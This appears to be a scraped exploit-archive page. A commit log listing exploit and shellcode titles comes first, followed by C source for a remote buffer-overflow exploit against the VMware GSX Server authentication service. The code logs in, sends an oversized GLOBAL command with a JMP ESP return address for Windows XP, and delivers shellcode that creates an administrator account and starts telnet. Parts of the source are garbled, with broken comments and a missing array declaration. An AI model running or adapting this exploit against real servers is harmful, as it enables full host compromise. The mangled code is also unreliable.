880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
162 lines
No EOL
4.7 KiB
C
162 lines
No EOL
4.7 KiB
C
// source: https://www.securityfocus.com/bid/5294/info
|
|
|
|
VMWare GSX Server ships with an authentication server. The server is vulnerable to a buffer overflow related to handling of the argument to the "GLOBAL" command. While attackers must be authenticated before the command can be issued, default accounts may exist. This has not been confirmed by VMWare.
|
|
|
|
This condition may be exploited to execute arbitrary code on the GSX server host. The code likely executes on the underlying, native system and may compromise the host entirely (including all virtual systems).
|
|
|
|
////////////////////////////////////////////////////////////////////
|
|
// VMwareOverflowTest v1.0
|
|
// Written by Zag & Glcs
|
|
// BigBall@venustech.com.cn glcs@venustech.com.cn
|
|
// http://www.Venustech.com
|
|
////////////////////////////////////////////////////////////////////
|
|
|
|
#include "stdio.h"
|
|
#include "winsock2.h"
|
|
#include "stdlib.h"
|
|
#pragma comment (lib, "Ws2_32")
|
|
|
|
to make sure that the shellcode length and GLOBAL command length not
|
|
exceed the limit.
|
|
|
|
//add an administrator account: x_adrc password: x_adrc
|
|
//start the telnet service
|
|
"\x68\xC1\x15\x35\x09\x81\x2C\x24"
|
|
"\x80\xD1\xF0\x08\x68\x63\x20\x20"
|
|
"\x2F\x68\x5F\x61\x64\x72\x68\x72"
|
|
"\x73\x20\x78\x68\x72\x61\x74\x6F"
|
|
"\x68\x6E\x69\x73\x74\x68\x61\x64"
|
|
"\x6D\x69\x68\x6F\x75\x70\x20\x68"
|
|
"\x61\x6C\x67\x72\x68\x20\x6C\x6F"
|
|
"\x63\x68\x26\x6E\x65\x74\x68\x74"
|
|
"\x73\x76\x72\x68\x20\x74\x6C\x6E"
|
|
"\x68\x74\x61\x72\x74\x68\x65\x74"
|
|
"\x20\x73\x68\x44\x44\x26\x6E\x68"
|
|
"\x63\x20\x2F\x41\x68\x5F\x61\x64"
|
|
"\x72\x68\x72\x63\x20\x78\x68\x78"
|
|
"\x5F\x61\x64\x68\x73\x65\x72\x20"
|
|
"\x68\x65\x74\x20\x75\x68\x2F\x63"
|
|
"\x20\x6E\x68\x63\x6D\x64\x20\x8B"
|
|
"\xC4\x6A\x01\x50\xB8\xC6\x84\xE6"
|
|
"\x77\xFF\xD0\x90";
|
|
|
|
//the JMP ESP address of WindowsXP English Version, we can add the address
|
|
of other systems, such as Windows 2000.
|
|
unsigned char Jmp_ESP_XP_Eng[] = {0x1b,0x17,0xe3,0x77};//WinXP Eng
|
|
unsigned char Jmp_ESP[4];
|
|
|
|
void usage ()
|
|
{
|
|
printf ("VMwareOverflowTest v1.0\n Written by Zag & Glcs\n
|
|
Email:BigBall@venustech.com.cn\n Glcs@venustech.com.cn\n
|
|
www.Venustech.com\n\nUsage:VMwareOverflowTest.exe <IP> <PORT> <username>
|
|
<passwd> <os type>\n\t0.Windows XP Eng\n");
|
|
return;
|
|
}
|
|
|
|
int main (int argc, char **argv)
|
|
{
|
|
char str[4096];
|
|
WSADATA wsa;
|
|
SOCKET sock;
|
|
struct sockaddr_in server;
|
|
int ret;
|
|
int i = 0;
|
|
if (argc != 6)
|
|
{
|
|
usage ();
|
|
return 0;
|
|
}
|
|
WSAStartup (MAKEWORD (2, 2), &wsa);
|
|
sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
server.sin_family = AF_INET;
|
|
server.sin_port = htons (atoi (argv[2]));
|
|
server.sin_addr.s_addr = inet_addr (argv[1]);
|
|
|
|
//the base address of DLL files on each systems is not the same, so
|
|
we need to modify the call address
|
|
//we can find that the system have loaded the DLL files we need by
|
|
check VMware Authorization Service
|
|
//then we only need modify the call address
|
|
//(BASE_ADDRESS + FUNCTION_OFFSET)
|
|
switch (atoi(argv[5]))
|
|
{
|
|
case 0:
|
|
shellcode[133] = 0xc6;
|
|
shellcode[134] = 0x84;
|
|
shellcode[135] = 0xe6;
|
|
shellcode[136] = 0x77;
|
|
|
|
strcpy (Jmp_ESP, Jmp_ESP_XP_Eng);
|
|
|
|
break;
|
|
default:
|
|
shellcode[133] = 0xc6;
|
|
shellcode[134] = 0x84;
|
|
shellcode[135] = 0xe6;
|
|
shellcode[136] = 0x77;
|
|
|
|
strcpy (Jmp_ESP, Jmp_ESP_XP_Eng);
|
|
break;
|
|
}
|
|
ret = connect (sock, (struct sockaddr *)&server, sizeof (server));
|
|
|
|
if (ret == SOCKET_ERROR)
|
|
{
|
|
printf ("connect error\n");
|
|
return -1;
|
|
}
|
|
|
|
//receive welcome message
|
|
memset (str, 0, sizeof (str));
|
|
recv (sock, str, 100, 0);
|
|
printf ("%s", str);
|
|
|
|
//send username confirm message
|
|
memset (str, 0, sizeof (str));
|
|
strcpy (str,"USER ");
|
|
strcat (str, argv[3]);
|
|
strcat (str, "\r\n");
|
|
ret = send (sock, str, strlen (str), 0);
|
|
|
|
//receive confirm message
|
|
memset (str, 0, sizeof (str));
|
|
recv (sock, str, 100, 0);
|
|
printf ("%s", str);
|
|
|
|
//send password
|
|
memset (str, 0, sizeof (str));
|
|
strcpy (str,"PASS ");
|
|
strcat (str, argv[4]);
|
|
strcat (str, "\r\n");
|
|
ret = send (sock, str, strlen (str), 0);
|
|
|
|
//receive confirm message
|
|
memset (str, 0, sizeof (str));
|
|
ret = recv (sock, str, 100, 0);
|
|
printf ("%s", str);
|
|
|
|
make GLOBAL command
|
|
memset (str, 0, sizeof (str));
|
|
strcpy (str, "GLOBAL ");
|
|
//to up the success probability, we use the half-continuous
|
|
covering, so the exact overflow point is not need
|
|
|
|
|
|
for(i = 7; i < 288; i += 8)
|
|
{
|
|
memcpy(str + i, "\x90\x90\x58\x68", 4);
|
|
//write the JMP ESP command into the possible return
|
|
address
|
|
memcpy(str + i + 4, Jmp_ESP, 4);
|
|
}
|
|
|
|
//append the shellcode to the GLOBAL command string
|
|
memcpy (str + i, shellcode, strlen (shellcode));
|
|
strcat (str, "\r\n");
|
|
ret = send (sock, str, strlen (str), 0);
|
|
printf ("Done!\n");
|
|
closesocket (sock);
|
|
WSACleanup ();
|
|
return 1;
|
|
} |